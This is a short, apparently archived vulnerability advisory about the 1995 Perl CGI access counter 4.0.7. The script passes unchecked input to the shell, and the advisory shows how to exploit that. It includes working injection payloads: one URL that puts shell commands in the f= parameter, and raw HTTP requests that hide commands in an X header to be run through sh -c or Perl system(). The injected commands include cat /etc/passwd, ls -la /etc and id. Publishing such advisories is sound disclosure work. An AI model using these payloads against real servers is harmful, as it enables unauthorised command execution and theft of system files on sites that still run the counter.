access.counter-4.0.7.txt

`The popular CGI web page access counter version 4.0.7 by George  
Burgyan allows execution of arbitrary commands due to unchecked  
user input. Commands are executed with the same privilege as  
the web server. Of course, other exploits can be used to get  
root access on an unpatched OS.  
  
The counter consists of a perl script called "counter", and  
multiple links to counter called counter-ord, counterfiglet,  
counterfiglet-ord, counterbanner, and counterbanner-ord. The  
following examples illustrate how they can be exploited:  
  
  
Using straight URL  
------------------  
http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id  
  
  
Passing commands in a variable  
------------------------------  
> telnet web-server www  
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0  
X: pwd;ls -la /etc;cat /etc/passwd  
  
> telnet web-server www  
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0  
X: echo;id;uname -a;w  
  
  
The counter was last updated in 1995 so is probably no longer  
supported. Links and email addresses referenced in the source  
code are no longer valid. However, it appears to still be widely  
used based on the number of references returned by search engine  
queries.  
  
  
Howard Kash  
  
`